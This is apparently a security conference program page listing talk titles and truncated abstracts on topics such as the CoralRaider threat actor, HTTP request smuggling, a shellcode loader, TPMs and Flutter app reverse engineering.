COMMSEC: CoralRaider Targets Victims Data and Social Media Accounts
PRESENTATION SLIDES In recent findings, Cisco Talos has uncovered a new threat actor, dubbed “CoralRaider,” believed to originate from Vietnam and driven by financial motivations. Operating since at least 2023, CoralRaider has targeted victims primarily across Asian and Southeast Asian countries, focusing on the theft of credentials, financial data, and social media accounts, including business […]
TESTING PAGE: ALPChecker – Detecting Spoofing and Blinding Attacks
In recent years, there has been a significant increase in the number of attacks on the Windows operating system carried out using kernel drivers. To date, there is a trend for attacks targeting AV\EDR systems. One of the vectors of such attacks targets the Asynchronous Local Procedure Call (ALPC) technology. Windows client-server interaction ALPC mechanism […]
Leveraging Request Smuggling For Authentication Bypass and Remote Code Execution
PRESENTATION SLIDES Offensive cybersecurity practitioners are familiar with the abbreviations XSS, CSRF, and SQLi, but how many people really recognize HRS (HTTP Request Smuggling)? Even though the original HRS paper came out nearly 20 years ago, we think request smuggling remains underappreciated in today’s security world. In this presentation, we discuss three HTTP request smuggling […]
WELCOME NOTE
COMMSEC 016
TBA
COMMSEC: My First and Last Shellcode Loader
PRESENTATION SLIDES RedTeamers often leverage shellcode loaders for initial access to deploy their C2 beacons. In this presentation, I will introduce my SuperMega shellcode loader laboratory, featuring a novel file injection technique called Cordyceps. Cordyceps reuses the Import Address Table (IAT) and data sections to deeply integrate into target executables, enabling it to operate under […]
COMMSEC: TPMs and the Linux Kernel: A Better Path to Hardware Security
PRESENTATION SLIDES TPMs have been present in modern laptops and servers for some time now, but their adoption is quite low. While operating systems do provide some security features based on TPMs (think of BitLocker on Windows or dm-verity on Linux) third party applications or libraries usually do not have TPM integrations. One of the […]
COMMSEC: Words Have Meaning! Leveraging LLMs to Enhance Insider Threat Investigation Capabilities
PRESENTATION SLIDES In this talk we present novel methods for the use of Generative AI – specifically Large Language Models (LLMs) to enhance the ability of cybersecurity investigators to trace and deter unauthorized exfiltration of text data that involves an air gap (shift in transmission mediums that resists digital forensic analysis). We review the definition […]
COMMSEC: Design and Development of a Multi-Tenant SIEM Using Security Onion
PRESENTATION SLIDES This design and development work proposes a management structure to support multi-tenant operations for MSSP (Managed Security Service Provider) software, specifically for open-source SIEM (Security Information and Event Management) software that lack built-in multi-tenant features. The primary challenges are the separation of user authorization and management for each tenant, especially in environments with […]
COMMSEC: Exploring Vulnerabilities in Flutter Mobile Apps Through Reverse Engineering
PRESENTATION SLIDES The popularity of the Flutter mobile application framework has surged in recent years, thanks to its versatility and ease of use. However, because Flutter is still relatively new, accessibility issues frequently arise in applications created with it. Consequently, developers have resorted to hardcoding sensitive information, such as keys and secret credentials, directly into […]